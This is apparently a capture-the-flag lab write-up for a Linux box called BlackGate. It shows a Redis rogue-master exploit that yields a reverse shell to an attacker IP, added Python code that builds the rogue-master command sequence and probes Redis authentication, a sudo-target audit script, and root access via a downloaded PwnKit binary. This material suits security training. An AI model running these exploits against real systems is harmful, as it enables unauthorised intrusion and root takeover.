# BlackGate

`redis` `pwnkit`

* Machine name: BlackGate
* Difficulty: Hard
* OS: Linux

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 06:24 EDT
Nmap scan report for 192.168.242.176
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 37:21:14:3e:23:e5:13:40:20:05:f9:79:e0:82:0b:09 (RSA)
|   256 b9:8d:bd:90:55:7c:84:cc:a0:7f:a8:b4:d3:55:06:a7 (ECDSA)
|_  256 07:07:29:7a:4c:7c:f2:b0:1f:3c:3f:2b:a1:56:9e:0a (ED25519)
6379/tcp open  redis   Redis key-value store 4.0.14
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Exploitation (Redis rogue server)

{% embed url="https://github.com/n0b0dyCN/redis-rogue-server/tree/master" %}

Redis 4.0.14 is reachable on 6379 and the script below succeeds without any password, so the instance is unauthenticated. The rogue-server technique points the target at a master we control (`SLAVEOF`), sets `dbfilename` to a `.so` name so the replication full sync writes our module to disk, then loads it with `MODULE LOAD` to gain a command-execution primitive, before cleaning the replication and file-name settings back up:

```
┌──(kali㉿kali)-[~/redis]
└─$ python redis.py --rhost 192.168.242.176 --lhost 192.168.45.224
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig

[info] TARGET 192.168.242.176:6379
[info] SERVER 192.168.45.224:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: 192.168.45.224
Reverse server port: 1234
[info] Reverse shell payload sent.
[info] Check at 192.168.45.224:1234
[info] Unload module...
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234                    
listening on [any] 1234 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.242.176] 49992
whoami
prudence
python3 -c 'import pty;pty.spawn("/bin/bash")'
prudence@blackgate:/tmp$ 
```
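The exchange above is automated by the tool. The following is an added example, not code from the writeup or from redis-rogue-server: a RESP encoder and reply decoder so the commands the rogue-master technique sends, and the replies that tell you whether the instance is open, can be read and replayed by hand. The command order is reconstructed from the tool's own log lines; the module file name `exp.so`, the IPs and ports, and the replies marked as constructed are assumptions.

```python
"""RESP wire format behind the Redis rogue-master technique (added example)."""
import socket
from typing import Any, List, Tuple


def encode_command(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings, as redis-cli does."""
    parts = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def decode_reply(buf: bytes) -> Tuple[Any, bytes]:
    """Decode one RESP reply; return (value, unconsumed bytes).
    Error replies are returned as RuntimeError instances, not raised,
    so an auth failure can be inspected like any other reply."""
    kind, body = buf[:1], buf[1:]
    line, _, rest = body.partition(b"\r\n")
    if kind == b"+":                      # simple string: +OK, +PONG
        return line.decode(), rest
    if kind == b"-":                      # error: -NOAUTH ..., -ERR ...
        return RuntimeError(line.decode()), rest
    if kind == b":":                      # integer
        return int(line), rest
    if kind == b"$":                      # bulk string; $-1 is a null
        n = int(line)
        if n < 0:
            return None, rest
        return rest[:n], rest[n + 2:]     # skip the trailing \r\n
    if kind == b"*":                      # array of nested replies
        items = []
        for _ in range(int(line)):
            item, rest = decode_reply(rest)
            items.append(item)
        return items, rest
    raise ValueError(f"unknown RESP type byte {kind!r}")


def auth_status(ping_reply: Any) -> str:
    """Classify the reply to PING; the rogue-server attack needs 'open'."""
    if ping_reply == "PONG":
        return "open"
    if isinstance(ping_reply, RuntimeError) and str(ping_reply).startswith("NOAUTH"):
        return "auth-required"
    return "unknown"


def redis_version(info_bulk: bytes) -> str:
    """Pull redis_version out of an 'INFO server' bulk reply."""
    for line in info_bulk.decode(errors="replace").splitlines():
        if line.startswith("redis_version:"):
            return line.split(":", 1)[1].strip()
    return ""


def classify_transcript(buf: bytes) -> Tuple[str, str]:
    """Decode the replies to PING + INFO server -> (auth status, version)."""
    ping, rest = decode_reply(buf)
    info, _ = decode_reply(rest) if rest else (None, b"")
    return auth_status(ping), (redis_version(info) if isinstance(info, bytes) else "")


def rogue_master_sequence(lhost: str, lport: int, module: str = "exp.so") -> List[bytes]:
    """Commands the rogue-master technique issues, in order. Reconstructed from
    the tool's log lines; the exact argument strings are assumptions."""
    return [
        encode_command("SLAVEOF", lhost, str(lport)),              # target syncs from us
        encode_command("CONFIG", "SET", "dbfilename", module),      # RDB payload lands as a .so
        encode_command("MODULE", "LOAD", f"./{module}"),            # load attacker-supplied commands
        encode_command("SLAVEOF", "NO", "ONE"),                     # detach from the rogue master
        encode_command("CONFIG", "SET", "dbfilename", "dump.rdb"),  # restore the default name
    ]


def probe(host: str, port: int = 6379, timeout: float = 3.0) -> Tuple[str, str]:
    """Live check against a target (network call; the offline demo below does not use it)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(encode_command("PING") + encode_command("INFO", "server"))
        buf = b""
        try:
            while True:
                chunk = s.recv(65536)
                if not chunk:
                    break
                buf += chunk
        except socket.timeout:
            pass                          # Redis keeps the connection open; stop at idle
    return classify_transcript(buf)


# Constructed replies (not captured from the target) for offline use.
INFO_BODY = b"# Server\r\nredis_version:4.0.14\r\nredis_mode:standalone\r\n"
OPEN_REPLIES = b"+PONG\r\n$%d\r\n%s\r\n" % (len(INFO_BODY), INFO_BODY)
LOCKED_REPLIES = b"-NOAUTH Authentication required.\r\n-NOAUTH Authentication required.\r\n"

if __name__ == "__main__":
    print(classify_transcript(OPEN_REPLIES))    # ('open', '4.0.14')
    print(classify_transcript(LOCKED_REPLIES))  # ('auth-required', '')
    for cmd in rogue_master_sequence("192.168.45.224", 21000):
        print(cmd)
```

Run `probe("192.168.242.176")` from the attacker box to get the same verdict live; a `NOAUTH` reply means `requirepass` is set and the rogue-server path needs a password first. Note the full sync is what actually carries the module bytes, so the rogue master must speak enough of the replication protocol to answer `PSYNC` with an RDB-shaped payload; that part is left to the tool.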

## Privilege escalation

```
prudence@blackgate:/home/prudence$ sudo -l
sudo -l
Matching Defaults entries for prudence on blackgate:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User prudence may run the following commands on blackgate:
    (root) NOPASSWD: /usr/local/bin/redis-status
```

We did not find a way to exploit it.
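Before moving on from a `NOPASSWD` entry like this one, the checks worth running are: who owns the file and its directory, whether it is a script, which commands it resolves through `PATH`, and whether it embeds credentials. The following is an added example (not from the writeup) that automates those checks; the `/usr/local/bin/redis-status` path comes from the `sudo -l` output, while the script body in `demo()` is constructed, since the page does not show the real one.

```python
"""Audit a sudo-allowed command before giving up on it (added example)."""
import os
import re
import stat
import tempfile
from typing import List

SHELL_WORDS = {"if", "then", "else", "elif", "fi", "for", "do", "done", "while",
               "case", "esac", "exit", "return", "echo", "set", "export", "local"}


def script_findings(text: str) -> List[str]:
    """Scan a shell script for commands resolved via PATH and for secrets."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        cmd = line.split()[0]
        if re.match(r"^\w+=", cmd):                 # variable assignment, not a command
            continue
        if "/" not in cmd and cmd not in SHELL_WORDS:
            findings.append(f"bare command '{cmd}' resolved via PATH")
        m = re.search(r"redis-cli\b.*\s-a\s+(\S+)", line)
        if m:
            findings.append(f"redis-cli password embedded: {m.group(1)}")
    return findings


def audit_sudo_target(path: str) -> List[str]:
    """File-level checks on the binary named in the sudoers entry."""
    findings = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        findings.append("symlink: audit the target instead")
    if st.st_uid != 0:
        findings.append(f"not owned by root (uid {st.st_uid})")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("group- or world-writable: replace its contents")
    if os.access(os.path.dirname(path) or ".", os.W_OK):
        findings.append("parent directory writable: file can be renamed/replaced")
    with open(path, "rb") as f:
        data = f.read()
    if data.startswith(b"#!"):
        shebang = data.splitlines()[0][2:].decode(errors="replace").strip()
        findings.append(f"script, interpreter {shebang}")
        findings.extend(script_findings(data.decode(errors="replace")))
    else:
        findings.append("compiled binary: check strings/ltrace for execve of bare names")
    return findings


def demo() -> List[str]:
    """Write a constructed redis-status script into a temp dir and audit it."""
    sample = ("#!/bin/sh\n"
              "# constructed example, not the real /usr/local/bin/redis-status\n"
              "systemctl status redis-server\n"
              "redis-cli -a S3cret ping\n")
    with tempfile.TemporaryDirectory() as d:
        p = os.path.join(d, "redis-status")
        with open(p, "w") as f:
            f.write(sample)
        os.chmod(p, 0o755)
        return audit_sudo_target(p)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On the target you would call `audit_sudo_target("/usr/local/bin/redis-status")`. A bare command is only a usable `PATH` hijack if one of the `secure_path` directories shown by `sudo -l` is writable, which the entry above rules out on a sane install; an embedded `redis-cli -a` password, on the other hand, is directly reusable against the Redis instance.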

We then looked for a local privilege-escalation exploit, and PwnKit (CVE-2021-4034, a bug in polkit's SUID `pkexec`, not a kernel bug) works. We fetch the prebuilt binary, serve it over HTTP from the attacker machine and run it on the target:

```
┌──(kali㉿kali)-[~/pwnkit]
└─$ curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
```

```
prudence@blackgate:/tmp$ wget http://192.168.45.224/pwnkit/PwnKit
wget http://192.168.45.224/pwnkit/PwnKit
--2024-08-28 11:11:16--  http://192.168.45.224/pwnkit/PwnKit
Connecting to 192.168.45.224:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18040 (18K) [application/octet-stream]
Saving to: ‘PwnKit’

PwnKit              100%[===================>]  17.62K  --.-KB/s    in 0.04s   

2024-08-28 11:11:16 (406 KB/s) - ‘PwnKit’ saved [18040/18040]

prudence@blackgate:/tmp$ chmod +x PwnKit
chmod +x PwnKit
prudence@blackgate:/tmp$ ./PwnKit
./PwnKit
root@blackgate:/tmp# whoami
whoami
root
```
